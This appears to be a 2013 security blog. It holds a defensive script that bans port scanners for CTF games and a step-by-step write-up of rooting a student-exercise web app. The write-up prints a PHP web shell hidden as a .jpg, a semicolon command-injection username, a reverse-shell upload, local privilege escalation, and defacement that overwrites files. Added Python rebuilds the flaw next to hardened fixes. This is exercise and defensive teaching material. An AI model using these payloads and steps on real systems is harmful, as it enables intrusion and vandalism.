Wednesday, May 15, 2013

Defensive Scripts for CTF

I did my first talk over at NoVA Hackers in Reston for the May monthly meeting.  I was running on fumes at the time, did the slides the night before on 4 hours of sleep before work, but still knocked it out.  The talk is about what makes a good defensive script, how they can be used, examples, and resources.  Examples included proofs of concept I developed, Unsploitable, Defense for the Blind, and Wintroll by Justin Wray, Ben Heise, and others from the project.

These tools are for king-of-the-hill style CTFs.  For example, there are 30 machines on a given subnet, and the team with the most flags planted at the end of the game wins.

Check out the talk.

Slides can be found here.
PDF Download

Monday, April 29, 2013

UMUC Presentation on Python

Download the pdf here

The two demo tools built with Python can be found here.  Download PyInstaller to turn them into an exe.

Auto add scanning host to windows firewall

Auto kill foreign connection

Tuesday, April 23, 2013

Tired of nmap scans on your windows box?

Cool, here's a solution; change the port as you see fit...

Create your socket listener

from __future__ import print_function
import socket
import sys
import os
import random

def startListen(host, port):

    # Create a TCP/IP socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    # Bind the socket to the address given on the command line and start listening
    server_address = (host, port)
    sock.bind(server_address)
    sock.listen(5)
    print('starting up on %s port %s' % sock.getsockname(), file=sys.stderr)


Start your infinite loop; when a connection comes in, pull the client IP out of the address tuple and hand it to the autoBan function.

    while True:
        print('waiting for a connection', file=sys.stderr)
        connection, client_address = sock.accept()
        print('client connected:', client_address, file=sys.stderr)
        # client_address is an (ip, port) tuple, so the IP needs no string parsing
        ip = client_address[0]
        connection.close()
        autoBan(ip)

Here is the autoBan function

def autoBan(host):
    randomNum = str(random.randrange(1, 1000000))
    # Windows Firewall rule that drops all inbound TCP from the scanning host; netsh must run from an elevated prompt
    command = "netsh advfirewall firewall add rule name=\"BAN" + randomNum + "\" protocol=TCP action=block dir=IN remoteip=" + host
    print(command)
    os.system(command)

Here is the main application

if __name__ == '__main__':
    # Usage: python <this script> <bind_address> <port>; host and port come from the command line
    host = sys.argv[1]
    port = int(sys.argv[2])
    startListen(host, port)

That's cool; check out what happens when I scan my machine with nmap's default settings.

$ sudo nmap -n -vv

Starting Nmap 6.00 ( ) at 2013-04-23 21:22 EDT
Initiating ARP Ping Scan at 21:22
Scanning [1 port]
Completed ARP Ping Scan at 21:22, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:22
Scanning [1000 ports]
Discovered open port 445/tcp on
Discovered open port 22/tcp on
Discovered open port 139/tcp on
Discovered open port 135/tcp on
Increasing send delay for from 0 to 5 due to 11 out of 15 dropped probes since last increase.
Increasing send delay for from 5 to 10 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 36.60% done; ETC: 21:23 (0:00:54 remaining)
Increasing send delay for from 10 to 20 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for from 20 to 40 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for from 40 to 80 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 62.85% done; ETC: 21:24 (0:00:52 remaining)
Increasing send delay for from 80 to 160 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for from 160 to 320 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 73.30% done; ETC: 21:25 (0:00:52 remaining)
Increasing send delay for from 320 to 640 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 77.40% done; ETC: 21:26 (0:00:57 remaining)
Increasing send delay for from 640 to 1000 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 80.75% done; ETC: 21:27 (0:01:00 remaining)
SYN Stealth Scan Timing: About 83.45% done; ETC: 21:28 (0:01:02 remaining)
SYN Stealth Scan Timing: About 86.35% done; ETC: 21:29 (0:00:59 remaining)
SYN Stealth Scan Timing: About 89.05% done; ETC: 21:30 (0:00:54 remaining)
SYN Stealth Scan Timing: About 91.50% done; ETC: 21:31 (0:00:46 remaining)
SYN Stealth Scan Timing: About 93.65% done; ETC: 21:31 (0:00:36 remaining)
Completed SYN Stealth Scan at 21:33, 678.28s elapsed (1000 total ports)
Nmap scan report for
Host is up (0.00055s latency).
Scanned at 2013-04-23 21:22:17 EDT for 679s
Not shown: 996 filtered ports
22/tcp  open  ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 678.40 seconds
           Raw packets sent: 2137 (94.012KB) | Rcvd: 5 (204B)
It took nmap 678.40 seconds to scan the machine since the scan dies midway....  It would be easy to bypass this script by just scanning Windows ports, but most people are too lazy, which is why this works.
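Here is a fuller version of the same idea, added as an example here rather than taken from the talk or the script above: the ban decision lives in one class with an allowlist (so a teammate or the gateway touching the tripwire port does not get you firewalled off your own box), one deterministic rule per IP so every rule can be deleted again at the end of the game, and the netsh command built as an argv list with a pluggable runner so the logic can be exercised on a box without netsh. The allowlist addresses, the BAN-<ip> rule-name scheme and the bind address/port are assumptions. One caveat worth knowing when testing: accept() only returns once the three-way handshake completes, so try a full-connect scan (nmap -sT) against the tripwire port as well as the default scan.

```python
import ipaddress
import socket
import subprocess


def netsh_block_argv(ip, rule_name):
    # argv list, no shell: netsh advfirewall firewall add rule name=... protocol=TCP action=block dir=IN remoteip=...
    return ["netsh", "advfirewall", "firewall", "add", "rule",
            "name=" + rule_name, "protocol=TCP", "action=block", "dir=IN", "remoteip=" + ip]


def netsh_unblock_argv(rule_name):
    # Companion command for cleanup at game end: netsh advfirewall firewall delete rule name=...
    return ["netsh", "advfirewall", "firewall", "delete", "rule", "name=" + rule_name]


class AutoBanner:
    """Decides whether a connecting IP gets a Windows Firewall block rule, and issues it."""

    def __init__(self, allowlist=(), runner=subprocess.call):
        # allowlist: team/infra addresses that must never be blocked (assumed values, supplied by the caller)
        self.allowlist = {ipaddress.ip_address(a) for a in allowlist}
        self.banned = {}          # ip -> rule name, so the rule can be deleted later
        self.runner = runner      # injectable so the logic can be exercised without netsh

    def rule_name(self, ip):
        # Deterministic name (assumed scheme): one rule per IP, easy to find and delete again
        return "BAN-" + ip

    def decide(self, ip):
        """Return None if ip should be blocked, else a short reason for skipping it."""
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            return "not an IP address"
        if addr.is_loopback:
            return "loopback"
        if addr in self.allowlist:
            return "allowlisted"
        if ip in self.banned:
            return "already banned"
        return None

    def ban(self, ip):
        """Block ip if decide() allows it; return the rule name, or None when skipped or netsh failed."""
        if self.decide(ip) is not None:
            return None
        name = self.rule_name(ip)
        if self.runner(netsh_block_argv(ip, name)) != 0:
            return None
        self.banned[ip] = name
        return name

    def unban_all(self):
        """Delete every rule this process created; returns the number removed."""
        removed = 0
        for ip, name in list(self.banned.items()):
            if self.runner(netsh_unblock_argv(name)) == 0:
                del self.banned[ip]
                removed += 1
        return removed


def serve(host, port, banner):
    """Tripwire listener: every completed TCP connection to host:port gets its source banned."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, port))
    sock.listen(5)
    try:
        while True:
            conn, (ip, _) = sock.accept()
            conn.close()
            banner.ban(ip)
    finally:
        sock.close()


if __name__ == "__main__":
    import sys
    # Example invocation (assumed): python tripwire.py 0.0.0.0 8080 10.0.0.1 10.0.0.2
    banner = AutoBanner(allowlist=sys.argv[3:])
    try:
        serve(sys.argv[1], int(sys.argv[2]), banner)
    except KeyboardInterrupt:
        banner.unban_all()
```

Run it from an elevated prompt (netsh will not add rules otherwise) and pass team addresses as the trailing arguments; Ctrl-C deletes every rule the process added, which the random BAN<number> names in the script above make awkward.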

Friday, April 19, 2013

Student exercise web application - How we got Root over http

Listed below are the steps we took to gain root access on a web application given as an inject. This method was used because the students were able to quickly fix the system exec commands located in the register page. The SQL injection was too tricky to use to write to disk. Our phpMyAdmin method could not be used since the schools slowly figured out that they did not need it installed. We needed to get really creative with it. All of us contributed to this solution, which is a bit crazy but worked out for us.

  1. Obtained the actual VM and source code (yes, we needed an advantage; the schools had this app for an entire day, so did we =P)
  2. Discovered multiple vulnerabilities within Register.php, Search.php, and Profile.php
  3. The logic for creating an account allowed us to write arbitrary files to disk.

      1. Create a username by the name of “Default” without quotes.
        • Create a php file with the following string <?php system($_GET["backup"])?>
        • Rename the php file with a .jpg extension to bypass the jpg file type restriction
        • Default.jpg that is located in /avatars/ is used for every new user who signs up. Its a placeholder photo.
        • When the PHP file renamed to .jpg is uploaded, it overwrites the existing Default.jpg on disk, because we created a username of Default.
        • Anytime you upload a file to the profile photo upload function, it is renamed to Profilename.jpg which allowed us to overwrite the default.jpg file.

      2. Create a username called “JimBob.php;” without quotes.
        • By adding a semicolon to the end of this username, the application copies the “Default.jpg” file with the php code we hid. The semicolon will rip off the .jpg extension. So you are now left with a file called JimBob.php.

  4. Access the php shell that we arbitrarily created by going to: YOUR COMMAND HERE
  5. Now that we had a command shell to execute commands, we needed to create an interactive shell as if we were connected through SSH. The user www-data that Apache was running as did not have root privileges, and we were unable to easily escalate privileges to root.
  6. We created an interactive shell by using the profile photo upload function to upload files we needed to the server.
      1. We downloaded the application and compiled the .c code on the same version of Ubuntu Linux
      2. We then uploaded two files, the php-findsock-shell.php file and findsock linux binary.
      3. In order to upload these files we still needed to rename each file with a .jpg extension.
      4. Each time we uploaded a file we used the JimBob.php file to rename the files we uploaded. These files needed to be uploaded by a normal username we created so they wouldn't overwrite our JimBob.php file.
      5. We renamed each file and moved them appropriately.
  7. Once the files were uploaded we could call our interactive Shell by using the following commands in our Bash terminal from any machine.
      1. $ nc -v 80
      2. GET /avatars/php-findsock-shell.php HTTP/1.0
      3. $ whoami
        • Output would be www-data, and we now had an interactive shell
  8. Escalate privileges to ROOT
      1. Since this application was running under an old version of Ubuntu, plenty of local root exploits were available. One which is very reliable is called wunderbar_emporiumv3.
      2. We had to compile the root exploit on our VM that we created with the same version of Ubuntu. The Gcc/G++ compiler was not installed on the school's VMs, so we could not compile anything on the host.
      3. After we compiled the exploit, we found the profile picture uploader was limited to 2 MB files. Our exploit was around 4-5 MB.
        • We bypassed this by splitting the exploit binary file into 3 pieces and uploading one piece at a time.
        • We then concatenated/appended each file together to put it back into one file through our interactive shell.
        • Chmod 777 on the file
        • ran the exploit with ./exploit
        • we now have ROOT!!! #
        • # whoami
        • # root

  1. Since we are nice guys, we decided to deface their website without destroying their entire application. We placed an index.html file with our awesome animated GIF file, thanks to other team members. index.html takes priority over index.php.
    1. The command chattr +i ./index.html was used to make it a pain to remove the file unless they were aware of that command. We forgot to put this on RMC, so RMC was able to remove theirs.
  2. We took it a step further and used the animated GIF file to overwrite every single .jpg file that existed on the server, with a simple Bash shell script that overwrites any file with the .jpg extension with our own.
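The write-up does not include the exercise's PHP, so the following is an added reconstruction in Python of the pattern it describes, not the students' code: a registration step that copies the placeholder avatar with a shell command that embeds the username unescaped (which is why the trailing semicolon in JimBob.php; ends the command and drops the .jpg), beside a hardened version that validates the username, refuses the reserved name Default, copies with a library call instead of a shell, and checks that an upload at least starts with JPEG magic bytes. The username regex, the reserved-name list and the demo() layout are assumptions. The magic-byte check is only a speed bump (a JPEG with PHP in a comment segment still passes), so the real fix for the upload path is serving the avatar directory without script execution or storing uploads outside the web root.

```python
import os
import re
import shutil
import subprocess
import tempfile

# Username policy (assumed): letters, digits and underscore only, so no '.', ';', '/' or other
# shell or path metacharacters ever reach a command line or a filename.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")
RESERVED_NAMES = {"default"}          # the placeholder avatar's basename must not be claimable
JPEG_MAGIC = b"\xff\xd8\xff"          # SOI marker every JPEG starts with


def vulnerable_register(avatars_dir, username):
    """Reconstruction of the pattern the write-up describes (not the exercise's PHP): the
    placeholder avatar is copied with a shell command that embeds the username unescaped."""
    cmd = "cp %s/Default.jpg %s/%s.jpg" % (avatars_dir, avatars_dir, username)
    # With username "JimBob.php;" the shell sees:  cp .../Default.jpg .../JimBob.php ; .jpg
    subprocess.call(cmd, shell=True, stderr=subprocess.DEVNULL)
    return sorted(os.listdir(avatars_dir))


def safe_register(avatars_dir, username):
    """Hardened form: validate the name, then copy with a library call instead of a shell."""
    if not USERNAME_RE.match(username) or username.lower() in RESERVED_NAMES:
        raise ValueError("invalid username")
    src = os.path.join(avatars_dir, "Default.jpg")
    dst = os.path.join(avatars_dir, username + ".jpg")
    shutil.copyfile(src, dst)
    return os.path.basename(dst)


def safe_store_avatar(avatars_dir, username, data):
    """Upload handler: same name policy, and the content must start like a JPEG. This does not
    stop a JPEG/PHP polyglot on its own; the directory must also be served without script execution."""
    if not USERNAME_RE.match(username) or username.lower() in RESERVED_NAMES:
        raise ValueError("invalid username")
    if not data.startswith(JPEG_MAGIC):
        raise ValueError("not a JPEG")
    path = os.path.join(avatars_dir, username + ".jpg")
    with open(path, "wb") as f:
        f.write(data)
    return os.path.basename(path)


def demo():
    """Reproduce the JimBob.php; trick against the vulnerable copy in a scratch directory,
    then show the hardened functions rejecting the same inputs. Returns the observations."""
    d = tempfile.mkdtemp()
    try:
        with open(os.path.join(d, "Default.jpg"), "wb") as f:
            f.write(b"<?php system($_GET['backup']); ?>")   # the disguised payload from the write-up
        after_attack = vulnerable_register(d, "JimBob.php;")
        safe_rejected = False
        try:
            safe_register(d, "JimBob.php;")
        except ValueError:
            safe_rejected = True
        upload_rejected = False
        try:
            safe_store_avatar(d, "Default", b"<?php phpinfo(); ?>")
        except ValueError:
            upload_rejected = True
        accepted = safe_store_avatar(d, "alice", JPEG_MAGIC + b"\x00" * 16)   # constructed JPEG stub
        return {"files": after_attack, "safe_rejected": safe_rejected,
                "upload_rejected": upload_rejected, "accepted": accepted}
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    print(demo())
```

demo() leaves a JimBob.php in the scratch directory (the web shell the write-up reached), while the hardened functions refuse both the semicolon name and the Default overwrite; only a well-formed name with JPEG content gets stored.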

Shine the light on some stuff I've been building

While doing more and more security competitions, development of automated scripts and post-exploitation tooling was required.  In order to keep track of this, I decided to start a blog and share some of my work.  A GitHub repository will be created as well once I get a hang of the licensing and such.... more to follow....